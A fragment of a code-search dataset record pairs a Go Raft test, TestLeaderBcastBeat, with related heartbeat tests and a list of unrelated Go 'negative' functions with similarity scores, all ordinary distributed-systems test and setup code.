awselb.NewController(\n\t\t\t\tcapiSharedInformers.Machines(),\n\t\t\t\tfakeKubeClient,\n\t\t\t\tclustopClient,\n\t\t\t\tcapiClient,\n\t\t\t)\n\t\t\treturn func() { controller.Run(1, stopCh) }\n\t\t}(),\n\t}\n\tvar wg sync.WaitGroup\n\twg.Add(len(runControllers))\n\tfor _, run := range runControllers {\n\t\tgo func(r func()) {\n\t\t\tdefer wg.Done()\n\t\t\tr()\n\t\t}(run)\n\t}\n\n\tt.Log(\"informers start\")\n\tkubeInformerFactory.Start(stopCh)\n\tclustopInformerFactory.Start(stopCh)\n\tcapiInformerFactory.Start(stopCh)\n\n\tshutdown := func() {\n\t\t// Shut down controller\n\t\tclose(stopCh)\n\t\t// Wait for all controller to stop\n\t\twg.Wait()\n\t\t// Shut down api server\n\t\tshutdownServer()\n\t}\n\n\treturn fakeKubeClient, kubeWatch, clustopClient, capiClient, fakeCAPIClient, shutdown\n}", "func (s *PBFTServer) handleRequestFollower(args *RequestArgs, reply *RequestReply) error {\n\tif !s.monitor {\n\t\ts.monitor = true\n\t\ts.change = time.AfterFunc(changeViewTimeout, s.startViewChange)\n\n\t\ts.replicas[s.view%len(s.replicas)].Call(\"PBFTServer.Request\", *args, reply)\n\t}\n\n\treturn nil\n}", "func TestBasicClientConnect(t *testing.T) {\n\t<-seq3\n\tports := make([]int, 0)\n\tports = append(ports, 7005)\n\tports = append(ports, 7006)\n\tports = append(ports, 7007)\n\twaitTime := 500 * time.Millisecond\n\tconfig := DefaultConfig()\n\tnodes, err := CreateDefinedLocalCluster(config, ports)\n\tif err != nil {\n\t\tt.Errorf(\"Failed to make cluster\")\n\t\treturn\n\t}\n\ttimeDelay := randomTimeout(5 * waitTime)\n\t<-timeDelay\n\t_, err = Connect(nodes[0].GetRemoteSelf().Addr)\n\tif err != nil {\n\t\tt.Errorf(\"Client failed to connect\")\n\t\treturn\n\t}\n\ttimeDelay = randomTimeout(5 * waitTime)\n\t<-timeDelay\n\torigLeaderIdx := -1\n\tfor idx, node := range nodes {\n\t\tif node.State == LEADER_STATE {\n\t\t\torigLeaderIdx = idx\n\t\t\tbreak\n\t\t}\n\t}\n\t//put origLeader at index 0\n\ttmp := nodes[0]\n\tnodes[0] = nodes[origLeaderIdx]\n\tnodes[origLeaderIdx] = tmp\n}", "func (thbm *ThreadHeartBeatManager) Start() {\n\tthbm.actorCtx.Send(thbm.worker, message.NewEvent(evtStartReq, nil), nil)\n}", "func TestLeaderTransferBack(t *testing.T) {\n\tnt := newNetwork(nil, nil, nil)\n\tdefer nt.closeAll()\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\n\tnt.isolate(3)\n\n\tlead := nt.peers[1].(*raft)\n\n\tnt.send(pb.Message{From: 3, To: 1, Type: pb.MsgTransferLeader})\n\tif lead.leadTransferee != 3 {\n\t\tt.Fatalf(\"wait transferring, leadTransferee = %v, want %v\", lead.leadTransferee, 3)\n\t}\n\n\t// Transfer leadership back to self.\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgTransferLeader})\n\n\tcheckLeaderTransferState(t, lead, StateLeader, 1)\n}", "func StartWith(localPeers []gubernator.PeerInfo) error {\n\tfor _, peer := range localPeers {\n\t\tctx, cancel := ctxutil.WithTimeout(context.Background(), clock.Second*10)\n\t\td, err := gubernator.SpawnDaemon(ctx, gubernator.DaemonConfig{\n\t\t\tLogger: logrus.WithField(\"instance\", peer.GRPCAddress),\n\t\t\tGRPCListenAddress: peer.GRPCAddress,\n\t\t\tHTTPListenAddress: peer.HTTPAddress,\n\t\t\tDataCenter: peer.DataCenter,\n\t\t\tBehaviors: gubernator.BehaviorConfig{\n\t\t\t\t// Suitable for testing but not production\n\t\t\t\tGlobalSyncWait: clock.Millisecond * 50,\n\t\t\t\tGlobalTimeout: clock.Second * 5,\n\t\t\t\tBatchTimeout: clock.Second * 5,\n\t\t\t},\n\t\t})\n\t\tcancel()\n\t\tif err != nil {\n\t\t\treturn errors.Wrapf(err, \"while starting server for addr '%s'\", peer.GRPCAddress)\n\t\t}\n\n\t\t// Add the peers and daemons to the package level variables\n\t\tpeers = append(peers, gubernator.PeerInfo{\n\t\t\tGRPCAddress: d.GRPCListeners[0].Addr().String(),\n\t\t\tHTTPAddress: d.HTTPListener.Addr().String(),\n\t\t\tDataCenter: peer.DataCenter,\n\t\t})\n\t\tdaemons = append(daemons, d)\n\t}\n\n\t// Tell each instance about the other peers\n\tfor _, d := range daemons {\n\t\td.SetPeers(peers)\n\t}\n\treturn nil\n}", "func (a *Agent) Start() error {\n\tgo func() {\n\t\tfor range a.peerUpdateChan {\n\t\t\tif err := a.members.UpdateNode(nodeUpdateTimeout); err != nil {\n\t\t\t\tlogrus.Errorf(\"error updating node metadata: %s\", err)\n\t\t\t}\n\t\t}\n\t}()\n\tif len(a.config.Peers) > 0 {\n\t\tif _, err := a.members.Join(a.config.Peers); err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\treturn nil\n}", "func (r *Raft) follower(timeout int) int {\n\twaitTime := timeout //start heartbeat timer,timeout func wil place HeartbeatTimeout on channel\n\tHeartBeatTimer := r.StartTimer(HeartbeatTimeout, waitTime) //start the timer to wait for HBs\n\tfor {\n\t\treq := r.receive()\n\t\tswitch req.(type) {\n\t\tcase AppendEntriesReq:\n\t\t\trequest := req.(AppendEntriesReq) //explicit typecasting\n\t\t\tr.serviceAppendEntriesReq(request, HeartBeatTimer, waitTime, follower)\n\t\tcase RequestVote:\n\t\t\trequest := req.(RequestVote)\n\t\t\tr.serviceRequestVote(request, follower)\n\t\tcase ClientAppendReq: //follower can't handle clients and redirects to leader, sends upto CommitCh as well as clientCh\n\t\t\trequest := req.(ClientAppendReq) //explicit typecasting\n\t\t\tresponse := ClientAppendResponse{}\n\t\t\tlogItem := LogItem{r.CurrentLogEntryCnt, false, request.Data} //lsn is count started from 0\n\t\t\tr.CurrentLogEntryCnt += 1\n\t\t\tresponse.LogEntry = logItem\n\t\t\tr.CommitCh <- &response.LogEntry\n\t\tcase int:\n\t\t\tHeartBeatTimer.Stop()\n\t\t\treturn candidate\n\t\t}\n\t}\n}", "func TestEnsureStandAlone(t *testing.T) {\n\n\t// Start a streaming server, and setup a route\n\tnOpts := DefaultNatsServerOptions\n\tnOpts.Cluster.Name = \"abc\"\n\tnOpts.Cluster.ListenStr = \"nats://127.0.0.1:5550\"\n\tnOpts.RoutesStr = \"nats://127.0.0.1:5551\"\n\n\tsOpts := GetDefaultOptions()\n\tsOpts.ID = clusterName\n\n\ts := runServerWithOpts(t, sOpts, &nOpts)\n\tdefer s.Shutdown()\n\n\t// Start a second streaming server and route to the first, while using the\n\t// same cluster ID. It should fail\n\tnOpts2 := DefaultNatsServerOptions\n\tnOpts2.Port = 4333\n\tnOpts2.Cluster.Name = \"abc\"\n\tnOpts2.Cluster.ListenStr = \"nats://127.0.0.1:5551\"\n\tnOpts2.RoutesStr = \"nats://127.0.0.1:5550\"\n\ts2, err := RunServerWithOpts(sOpts, &nOpts2)\n\tif s2 != nil || err == nil {\n\t\ts2.Shutdown()\n\t\tt.Fatal(\"Expected server to fail to start, it did not\")\n\t}\n}", "func (r *Replicator) Start(thriftService []thrift.TChanServer) {\n\tr.SCommon.Start(thriftService)\n\tr.hostIDHeartbeater = common.NewHostIDHeartbeater(r.metaClient, r.GetHostUUID(), r.GetHostPort(), r.GetHostName(), r.logger)\n\tr.hostIDHeartbeater.Start()\n\tr.replicatorclientFactory.SetTChannel(r.GetTChannel())\n\n\tr.metadataReconciler = NewMetadataReconciler(r.metaClient, r, r.localZone, r.logger, r.m3Client)\n\tr.metadataReconciler.Start()\n}", "func TestPeerManager(t *testing.T) {\n\n\tseeds := []string {\"127.0.0.1:6000\",}\n\tmanager1 := CreatePeerManager(6000, 6001, nil, FullMode)\n\tmanager2 := CreatePeerManager(7000, 7001, seeds, FullMode)\n\tmanager3 := CreatePeerManager(8000, 8001, seeds, FullMode)\n\n\tallPeers := []string {\"127.0.0.1:6001\", \"127.0.0.1:7001\", \"127.0.0.1:8001\"}\n\tPeerManagerPropagationHelper(t, manager1, manager2, manager3, \n\t\t\t\t\t\t\t\tallPeers, allPeers, allPeers, nil, time.Second, 2*time.Second)\t\n}", "func (this *Twitter) Follow(followerId int, followeeId int) {\n\tif _, ok := this.Users[followerId]; !ok {\n\t\tthis.Users[followerId] = NewUser(followerId)\n\t}\n\tif _, ok := this.Users[followeeId]; !ok {\n\t\tthis.Users[followeeId] = NewUser(followeeId)\n\t}\n\tthis.Users[followerId].follow(followeeId)\n}", "func TestPreVoteWithSplitVote(t *testing.T) {\n\tn1 := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\tn2 := newTestRaft(2, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\tn3 := newTestRaft(3, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\tdefer closeAndFreeRaft(n1)\n\tdefer closeAndFreeRaft(n2)\n\tdefer closeAndFreeRaft(n3)\n\n\tn1.becomeFollower(1, None)\n\tn2.becomeFollower(1, None)\n\tn3.becomeFollower(1, None)\n\n\tn1.preVote = true\n\tn2.preVote = true\n\tn3.preVote = true\n\n\tnt := newNetwork(n1, n2, n3)\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\n\t// simulate leader down. followers start split vote.\n\tnt.isolate(1)\n\tnt.send([]pb.Message{\n\t\t{From: 2, To: 2, Type: pb.MsgHup},\n\t\t{From: 3, To: 3, Type: pb.MsgHup},\n\t}...)\n\n\t// check whether the term values are expected\n\t// n2.Term == 3\n\t// n3.Term == 3\n\tsm := nt.peers[2].(*raft)\n\tif sm.Term != 3 {\n\t\tt.Errorf(\"peer 2 term: %d, want %d\", sm.Term, 3)\n\t}\n\tsm = nt.peers[3].(*raft)\n\tif sm.Term != 3 {\n\t\tt.Errorf(\"peer 3 term: %d, want %d\", sm.Term, 3)\n\t}\n\n\t// check state\n\t// n2 == candidate\n\t// n3 == candidate\n\tsm = nt.peers[2].(*raft)\n\tif sm.state != StateCandidate {\n\t\tt.Errorf(\"peer 2 state: %s, want %s\", sm.state, StateCandidate)\n\t}\n\tsm = nt.peers[3].(*raft)\n\tif sm.state != StateCandidate {\n\t\tt.Errorf(\"peer 3 state: %s, want %s\", sm.state, StateCandidate)\n\t}\n\n\t// node 2 election timeout first\n\tnt.send(pb.Message{From: 2, To: 2, Type: pb.MsgHup})\n\n\t// check whether the term values are expected\n\t// n2.Term == 4\n\t// n3.Term == 4\n\tsm = nt.peers[2].(*raft)\n\tif sm.Term != 4 {\n\t\tt.Errorf(\"peer 2 term: %d, want %d\", sm.Term, 4)\n\t}\n\tsm = nt.peers[3].(*raft)\n\tif sm.Term != 4 {\n\t\tt.Errorf(\"peer 3 term: %d, want %d\", sm.Term, 4)\n\t}\n\n\t// check state\n\t// n2 == leader\n\t// n3 == follower\n\tsm = nt.peers[2].(*raft)\n\tif sm.state != StateLeader {\n\t\tt.Errorf(\"peer 2 state: %s, want %s\", sm.state, StateLeader)\n\t}\n\tsm = nt.peers[3].(*raft)\n\tif sm.state != StateFollower {\n\t\tt.Errorf(\"peer 3 state: %s, want %s\", sm.state, StateFollower)\n\t}\n}", "func (e *EndToEndTest) StartServer(parameters ...string) error {\n\terr := exec.Command(\"docker\", \"volume\", \"create\", fmt.Sprintf(\"%s-data\", e.Identity)).Run()\n\tif err != nil {\n\t\treturn err\n\t}\n\tif e.Context == \"docker-zfs\" {\n\t\treturn e.RunTitanDocker(\"launch\", true)\n\t} else {\n\t\treturn e.RunTitanKubernetes(\"run\", parameters...)\n\t}\n}", "func SetupTestCase(t *testing.T, config string, quit chan interface{}, verbose bool) (func(t *testing.T), []*Server, error) {\n\n\t// lock used to protect servers return value ,\n\t// while we initialize in go routine each server\n\tvar lck = &sync.Mutex{}\n\tvar servers []*Server\n\n\tif verbose {\n\t\tt.Log(\"setup test case\")\n\t}\n\n\tvar configFile = config\n\tartifact, err := artifacts.Read(configFile)\n\tif err != nil {\n\t\treturn nil, nil, err\n\t}\n\tif len(artifact.Formation.Cluster.Controllers) == 0 {\n\t\treturn nil, nil, fmt.Errorf(\"empty controller list\")\n\t}\n\tcontrollers := artifact.Formation.Cluster.Controllers\n\t_, err = net.ResolveTCPAddr(\"tcp\", \"0.0.0.0:12345\")\n\tif err != nil {\n\t\treturn nil, nil, err\n\t}\n\n\tif verbose {\n\t\tt.Log(\"setup server\")\n\t}\n\n\tvar wg sync.WaitGroup\n\tvar raftBinding string\n\tvar restBinding string\n\tvar myNetworkSpec ServerSpec\n\n\tfor i, controller := range controllers {\n\t\tnetworkSpec := make([]ServerSpec, 0)\n\n\t\traftBinding = io.GenerateId(controllers[i].Address, controller.Port)\n\t\trestBinding = io.GenerateId(controllers[i].Address, controller.Rest)\n\n\t\tmyNetworkSpec = ServerSpec{\n\t\t\tServerID: hs.Hash64(raftBinding),\n\t\t\tRaftNetworkBind: raftBinding,\n\t\t\tRestNetworkBind: restBinding,\n\t\t\tGrpcNetworkBind: raftBinding,\n\t\t\tBasedir: artifact.BaseDir,\n\t\t\tLogDir: \"\",\n\t\t}\n\n\t\t// if both port area free add to peer list, all other peers\n\t\t// final result should:\n\t\t// myNetworkSpec hold server spec\n\t\t// peerSpec hold all other peer spec\n\t\tif io.CheckSocket(raftBinding, \"tcp\") && io.CheckSocket(restBinding, \"tcp\") {\n\t\t\tglog.Infof(\"Found unused port, server id \", raftBinding)\n\t\t\tmyPort := controllers[i].Port\n\t\t\tfor p := 0; p < len(controllers); p++ {\n\t\t\t\tif p != i {\n\t\t\t\t\traftBind := io.GenerateId(controllers[p].Address, controllers[p].Port)\n\t\t\t\t\trestBind := io.GenerateId(controllers[p].Address, controllers[p].Rest)\n\t\t\t\t\tspec := ServerSpec{\n\t\t\t\t\t\tRaftNetworkBind: raftBind,\n\t\t\t\t\t\tRestNetworkBind: restBind,\n\t\t\t\t\t\tGrpcNetworkBind: \"\",\n\t\t\t\t\t}\n\t\t\t\t\tnetworkSpec = append(networkSpec, spec)\n\t\t\t\t}\n\t\t\t}\n\n\t\t\twg.Add(1)\n\t\t\tgo func(mySpec ServerSpec, peerSpec []ServerSpec, p string) {\n\n\t\t\t\t// start serving\n\t\t\t\tif verbose {\n\t\t\t\t\tt.Log(\"Starting server\", mySpec)\n\t\t\t\t}\n\t\t\t\tready := make(chan interface{})\n\t\t\t\tsrv, err := NewServer(mySpec, peerSpec, p, false, ready)\n\t\t\t\tif err != nil {\n\t\t\t\t\tglog.Fatal(\"Failed to start server. %v\", err)\n\t\t\t\t}\n\n\t\t\t\tlck.Lock()\n\t\t\t\tservers = append(servers, srv)\n\t\t\t\tif verbose {\n\t\t\t\t\tt.Log(\"Added server to a list\", len(servers))\n\t\t\t\t}\n\t\t\t\twg.Done()\n\t\t\t\tlck.Unlock()\n\n\t\t\t\t// signal to start a server\n\t\t\t\tclose(ready)\n\t\t\t\terr = srv.Serve()\n\t\t\t\tif err != nil {\n\t\t\t\t\tglog.Error(err)\n\t\t\t\t\treturn\n\t\t\t\t}\n\n\t\t\t}(myNetworkSpec, networkSpec, myPort)\n\t\t} else {\n\t\t\tt.Log(\"can't bind server check if ports are in use\", raftBinding)\n\t\t}\n\t\tif verbose {\n\t\t\tt.Log(\"server started.\")\n\t\t}\n\t}\n\n\twg.Wait()\n\tif verbose {\n\t\tt.Log(\"all server started.\")\n\t}\n\n\t// return callback to close channel and shutdownGrpc servers\n\treturn func(t *testing.T) {\n\t\tif verbose {\n\t\t\tt.Log(\"Shutdown.\")\n\t\t}\n\n\t\tfor i, _ := range servers {\n\t\t\tservers[i].Shutdown()\n\t\t\tservers[i].rest.StopRest()\n\t\t}\n\n\t\tclose(quit)\n\n\t\tif verbose {\n\t\t\tt.Log(\"teardown test case\")\n\t\t}\n\t}, servers, nil\n}" ]
[ "0.595199", "0.58877313", "0.58543223", "0.5852667", "0.58501625", "0.57495034", "0.5743804", "0.57330644", "0.57233655", "0.5692679", "0.5688954", "0.56840384", "0.5670661", "0.5664961", "0.5647548", "0.5643796", "0.5638572", "0.55047965", "0.5490936", "0.5486376", "0.5481372", "0.54734075", "0.54696304", "0.5448783", "0.5441413", "0.54372853", "0.5435996", "0.54347306", "0.5434282", "0.5384071", "0.53790814", "0.53640366", "0.53619283", "0.5343631", "0.5342214", "0.53138083", "0.5308666", "0.5304367", "0.5278118", "0.5277663", "0.52761036", "0.5270287", "0.5259487", "0.52528596", "0.5249029", "0.5232093", "0.52311754", "0.5229475", "0.5226799", "0.5219952", "0.521526", "0.52091193", "0.52036536", "0.5193649", "0.51914126", "0.51869875", "0.51783943", "0.5162525", "0.5159659", "0.5140051", "0.513645", "0.51350737", "0.51334476", "0.5132865", "0.513083", "0.512922", "0.5118696", "0.5117325", "0.5104538", "0.509612", "0.50944793", "0.5083661", "0.5077578", "0.5072666", "0.50706536", "0.5063142", "0.5061182", "0.5060273", "0.5034711", "0.5032536", "0.50324667", "0.50324035", "0.5030949", "0.5029699", "0.5024006", "0.5022382", "0.50165606", "0.50119066", "0.50116354", "0.5008417", "0.50068265", "0.50065184", "0.50036687", "0.49990177", "0.49985495", "0.49978623", "0.4994438", "0.49923626", "0.49855736", "0.49756625" ]
0.81484336
0
TestLeaderBcastBeat tests that if the leader receives a heartbeat tick, it will send a msgApp with m.Index = 0, m.LogTerm=0 and empty entries as heartbeat to all followers. Reference: section 5.2
func TestLeaderBcastBeat(t *testing.T) { // heartbeat interval hi := 1 r := newTestRaft(1, []uint64{1, 2, 3}, 10, hi, NewMemoryStorage()) defer closeAndFreeRaft(r) r.becomeCandidate() r.becomeLeader() for i := 0; i < 10; i++ { r.appendEntry(pb.Entry{Index: uint64(i) + 1}) } for i := 0; i < hi; i++ { r.tick() } msgs := r.readMessages() sort.Sort(messageSlice(msgs)) wmsgs := []pb.Message{ {From: 1, FromGroup: pb.Group{NodeId: 1, GroupId: 1, RaftReplicaId: 1}, To: 2, ToGroup: pb.Group{NodeId: 2, GroupId: 1, RaftReplicaId: 2}, Term: 1, Type: pb.MsgHeartbeat}, {From: 1, FromGroup: pb.Group{NodeId: 1, GroupId: 1, RaftReplicaId: 1}, To: 3, ToGroup: pb.Group{NodeId: 3, GroupId: 1, RaftReplicaId: 3}, Term: 1, Type: pb.MsgHeartbeat}, } if !reflect.DeepEqual(msgs, wmsgs) { t.Errorf("msgs = %v, want %v", msgs, wmsgs) } }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func TestBcastBeat(t *testing.T) {\n\toffset := uint64(1000)\n\t// make a state machine with log.offset = 1000\n\tpeerGrps := make([]*pb.Group, 0)\n\tfor _, pid := range []uint64{1, 2, 3} {\n\t\tgrp := pb.Group{\n\t\t\tNodeId: pid,\n\t\t\tRaftReplicaId: pid,\n\t\t\tGroupId: 1,\n\t\t}\n\t\tpeerGrps = append(peerGrps, &grp)\n\t}\n\n\ts := pb.Snapshot{\n\t\tMetadata: pb.SnapshotMetadata{\n\t\t\tIndex: offset,\n\t\t\tTerm: 1,\n\t\t\tConfState: pb.ConfState{Nodes: []uint64{1, 2, 3}, Groups: peerGrps},\n\t\t},\n\t}\n\tstorage := NewMemoryStorage()\n\tstorage.ApplySnapshot(s)\n\tsm := newTestRaft(1, nil, 10, 1, storage)\n\tdefer closeAndFreeRaft(sm)\n\tsm.Term = 1\n\n\tsm.becomeCandidate()\n\tsm.becomeLeader()\n\tfor i := 0; i < 10; i++ {\n\t\tsm.appendEntry(pb.Entry{Index: uint64(i) + 1})\n\t}\n\t// slow follower\n\tsm.prs[2].Match, sm.prs[2].Next = 5, 6\n\t// normal follower\n\tsm.prs[3].Match, sm.prs[3].Next = sm.raftLog.lastIndex(), sm.raftLog.lastIndex()+1\n\n\tsm.Step(pb.Message{Type: pb.MsgBeat})\n\tmsgs := sm.readMessages()\n\tif len(msgs) != 2 {\n\t\tt.Fatalf(\"len(msgs) = %v, want 2\", len(msgs))\n\t}\n\twantCommitMap := map[uint64]uint64{\n\t\t2: min(sm.raftLog.committed, sm.prs[2].Match),\n\t\t3: min(sm.raftLog.committed, sm.prs[3].Match),\n\t}\n\tfor i, m := range msgs {\n\t\tif m.Type != pb.MsgHeartbeat {\n\t\t\tt.Fatalf(\"#%d: type = %v, want = %v\", i, m.Type, pb.MsgHeartbeat)\n\t\t}\n\t\tif m.Index != 0 {\n\t\t\tt.Fatalf(\"#%d: prevIndex = %d, want %d\", i, m.Index, 0)\n\t\t}\n\t\tif m.LogTerm != 0 {\n\t\t\tt.Fatalf(\"#%d: prevTerm = %d, want %d\", i, m.LogTerm, 0)\n\t\t}\n\t\tif wantCommitMap[m.To] == 0 {\n\t\t\tt.Fatalf(\"#%d: unexpected to %d\", i, m.To)\n\t\t} else {\n\t\t\tif m.Commit != wantCommitMap[m.To] {\n\t\t\t\tt.Fatalf(\"#%d: commit = %d, want %d\", i, m.Commit, wantCommitMap[m.To])\n\t\t\t}\n\t\t\tdelete(wantCommitMap, m.To)\n\t\t}\n\t\tif len(m.Entries) != 0 {\n\t\t\tt.Fatalf(\"#%d: len(entries) = %d, want 0\", i, len(m.Entries))\n\t\t}\n\t}\n}", "func TestRecvMsgBeat(t *testing.T) {\n\ttests := []struct {\n\t\tstate StateType\n\t\twMsg int\n\t}{\n\t\t{StateLeader, 2},\n\t\t// candidate and follower should ignore MsgBeat\n\t\t{StateCandidate, 0},\n\t\t{StateFollower, 0},\n\t}\n\n\tfor i, tt := range tests {\n\t\tsm := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\t\tsm.raftLog = &raftLog{storage: newInitedMemoryStorage([]pb.Entry{{}, {Index: 1, Term: 0}, {Index: 2, Term: 1}})}\n\t\tdefer closeAndFreeRaft(sm)\n\t\tsm.Term = 1\n\t\tsm.state = tt.state\n\t\tswitch tt.state {\n\t\tcase StateFollower:\n\t\t\tsm.step = stepFollower\n\t\tcase StateCandidate:\n\t\t\tsm.step = stepCandidate\n\t\tcase StateLeader:\n\t\t\tsm.step = stepLeader\n\t\t}\n\t\tsm.Step(pb.Message{From: 1, To: 1, Type: pb.MsgBeat})\n\n\t\tmsgs := sm.readMessages()\n\t\tif len(msgs) != tt.wMsg {\n\t\t\tt.Errorf(\"%d: len(msgs) = %d, want %d\", i, len(msgs), tt.wMsg)\n\t\t}\n\t\tfor _, m := range msgs {\n\t\t\tif m.Type != pb.MsgHeartbeat {\n\t\t\t\tt.Errorf(\"%d: msg.type = %v, want %v\", i, m.Type, pb.MsgHeartbeat)\n\t\t\t}\n\t\t}\n\t}\n}", "func TestHB11SendReceiveApollo(t *testing.T) {\n\tif os.Getenv(\"STOMP_TEST11\") == \"\" {\n\t\tfmt.Println(\"TestHB11SendReceiveApollo norun\")\n\t\treturn\n\t}\n\tif os.Getenv(\"STOMP_HB11LONG\") == \"\" {\n\t\tfmt.Println(\"TestHB11SendReceiveApollo norun LONG\")\n\t\treturn\n\t}\n\t//\n\tn, _ := openConn(t)\n\tconn_headers := check11(TEST_HEADERS)\n\tconn_headers = conn_headers.Add(\"heart-beat\", \"10000,10\")\n\tc, e := Connect(n, conn_headers)\n\t// Error checks\n\tif e != nil {\n\t\tt.Errorf(\"Heartbeat send-receive connect error, unexpected: %q\", e)\n\t}\n\tif c.hbd == nil {\n\t\tt.Errorf(\"Heartbeat send-receive error expected hbd value.\")\n\t}\n\t//\n\tl := log.New(os.Stdout, \"\", log.Ldate|log.Lmicroseconds)\n\tc.SetLogger(l)\n\t//\n\tfmt.Println(\"TestHB11SendReceiveApollo start sleep\")\n\ttime.Sleep(1e9 * 120) // 120 secs\n\tfmt.Println(\"TestHB11SendReceiveApollo end sleep\")\n\tc.SetLogger(nil)\n\tif c.Hbrf {\n\t\tt.Errorf(\"Error, dirty heart beat read detected\")\n\t}\n\t//\n\t_ = c.Disconnect(empty_headers)\n\t_ = closeConn(t, n)\n}", "func TestHandleHeartbeatResp(t *testing.T) {\n\tstorage := NewMemoryStorage()\n\tdefer storage.Close()\n\tstorage.Append([]pb.Entry{{Index: 1, Term: 1}, {Index: 2, Term: 2}, {Index: 3, Term: 3}})\n\tsm := newTestRaft(1, []uint64{1, 2}, 5, 1, storage)\n\tsm.becomeCandidate()\n\tsm.becomeLeader()\n\tsm.raftLog.commitTo(sm.raftLog.lastIndex())\n\n\t// A heartbeat response from a node that is behind; re-send MsgApp\n\tsm.Step(pb.Message{From: 2, Type: pb.MsgHeartbeatResp})\n\tmsgs := sm.readMessages()\n\tif len(msgs) != 1 {\n\t\tt.Fatalf(\"len(msgs) = %d, want 1\", len(msgs))\n\t}\n\tif msgs[0].Type != pb.MsgApp {\n\t\tt.Errorf(\"type = %v, want MsgApp\", msgs[0].Type)\n\t}\n\n\t// A second heartbeat response generates another MsgApp re-send\n\tsm.Step(pb.Message{From: 2, Type: pb.MsgHeartbeatResp})\n\tmsgs = sm.readMessages()\n\tif len(msgs) != 1 {\n\t\tt.Fatalf(\"len(msgs) = %d, want 1\", len(msgs))\n\t}\n\tif msgs[0].Type != pb.MsgApp {\n\t\tt.Errorf(\"type = %v, want MsgApp\", msgs[0].Type)\n\t}\n\n\t// Once we have an MsgAppResp, heartbeats no longer send MsgApp.\n\tsm.Step(pb.Message{\n\t\tFrom: 2,\n\t\tType: pb.MsgAppResp,\n\t\tIndex: msgs[0].Index + uint64(len(msgs[0].Entries)),\n\t})\n\t// Consume the message sent in response to MsgAppResp\n\tsm.readMessages()\n\n\tsm.Step(pb.Message{From: 2, Type: pb.MsgHeartbeatResp})\n\tmsgs = sm.readMessages()\n\tif len(msgs) != 0 {\n\t\tt.Fatalf(\"len(msgs) = %d, want 0: %+v\", len(msgs), msgs)\n\t}\n}", "func TestHB11SendReceive(t *testing.T) {\n\tif os.Getenv(\"STOMP_TEST11\") == \"\" {\n\t\tfmt.Println(\"TestHB11SendReceive norun\")\n\t\treturn\n\t}\n\tif os.Getenv(\"STOMP_HB11LONG\") == \"\" {\n\t\tfmt.Println(\"TestHB11SendReceive norun LONG\")\n\t\treturn\n\t}\n\t//\n\tn, _ := openConn(t)\n\tconn_headers := check11(TEST_HEADERS)\n\tconn_headers = conn_headers.Add(\"heart-beat\", \"10000,6000\")\n\tc, e := Connect(n, conn_headers)\n\t// Error checks\n\tif e != nil {\n\t\tt.Errorf(\"Heartbeat send-receive connect error, unexpected: %q\", e)\n\t}\n\tif c.hbd == nil {\n\t\tt.Errorf(\"Heartbeat send-receive error expected hbd value.\")\n\t}\n\t//\n\tl := log.New(os.Stdout, \"\", log.Ldate|log.Lmicroseconds)\n\tc.SetLogger(l)\n\t//\n\tfmt.Println(\"TestHB11SendReceive start sleep\")\n\ttime.Sleep(1e9 * 120) // 120 secs\n\tfmt.Println(\"TestHB11SendReceive end sleep\")\n\tc.SetLogger(nil)\n\tif c.Hbrf {\n\t\tt.Errorf(\"Error, dirty heart beat read detected\")\n\t}\n\t//\n\t_ = c.Disconnect(empty_headers)\n\t_ = closeConn(t, n)\n}", "func TestHandleHeartbeat(t *testing.T) {\n\tcommit := uint64(2)\n\ttests := []struct {\n\t\tm pb.Message\n\t\twCommit uint64\n\t}{\n\t\t{pb.Message{From: 2, To: 1, Type: pb.MsgHeartbeat, Term: 2, Commit: commit + 1}, commit + 1},\n\t\t{pb.Message{From: 2, To: 1, Type: pb.MsgHeartbeat, Term: 2, Commit: commit - 1}, commit}, // do not decrease commit\n\t}\n\n\tfor i, tt := range tests {\n\t\tstorage := NewMemoryStorage()\n\t\tdefer storage.Close()\n\t\tstorage.Append([]pb.Entry{{Index: 1, Term: 1}, {Index: 2, Term: 2}, {Index: 3, Term: 3}})\n\t\tsm := newTestRaft(1, []uint64{1, 2}, 5, 1, storage)\n\t\tsm.becomeFollower(2, 2)\n\t\tsm.raftLog.commitTo(commit)\n\t\tsm.handleHeartbeat(tt.m)\n\t\tif sm.raftLog.committed != tt.wCommit {\n\t\t\tt.Errorf(\"#%d: committed = %d, want %d\", i, sm.raftLog.committed, tt.wCommit)\n\t\t}\n\t\tm := sm.readMessages()\n\t\tif len(m) != 1 {\n\t\t\tt.Fatalf(\"#%d: msg = nil, want 1\", i)\n\t\t}\n\t\tif m[0].Type != pb.MsgHeartbeatResp {\n\t\t\tt.Errorf(\"#%d: type = %v, want MsgHeartbeatResp\", i, m[0].Type)\n\t\t}\n\t}\n}", "func TestHB11NoSend(t *testing.T) {\n\tif os.Getenv(\"STOMP_TEST11\") == \"\" {\n\t\tfmt.Println(\"TestHB11NoSend norun\")\n\t\treturn\n\t}\n\tif os.Getenv(\"STOMP_HB11LONG\") == \"\" {\n\t\tfmt.Println(\"TestHB11NoSend norun LONG\")\n\t\treturn\n\t}\n\t//\n\tn, _ := openConn(t)\n\tconn_headers := check11(TEST_HEADERS)\n\tconn_headers = conn_headers.Add(\"heart-beat\", \"0,6000\") // No sending\n\tc, e := Connect(n, conn_headers)\n\t// Error checks\n\tif e != nil {\n\t\tt.Errorf(\"Heartbeat nosend connect error, unexpected: %q\", e)\n\t}\n\tif c.hbd == nil {\n\t\tt.Errorf(\"Heartbeat nosend error expected hbd value.\")\n\t}\n\t//\n\tl := log.New(os.Stdout, \"\", log.Ldate|log.Lmicroseconds)\n\tc.SetLogger(l)\n\t//\n\tfmt.Println(\"TestHB11NoSend start sleep\")\n\ttime.Sleep(1e9 * 120) // 120 secs\n\tfmt.Println(\"TestHB11NoSend end sleep\")\n\tc.SetLogger(nil)\n\t//\n\tif c.Hbrf {\n\t\tt.Errorf(\"Error, dirty heart beat read detected\")\n\t}\n\t//\n\t_ = c.Disconnect(empty_headers)\n\t_ = closeConn(t, n)\n}", "func 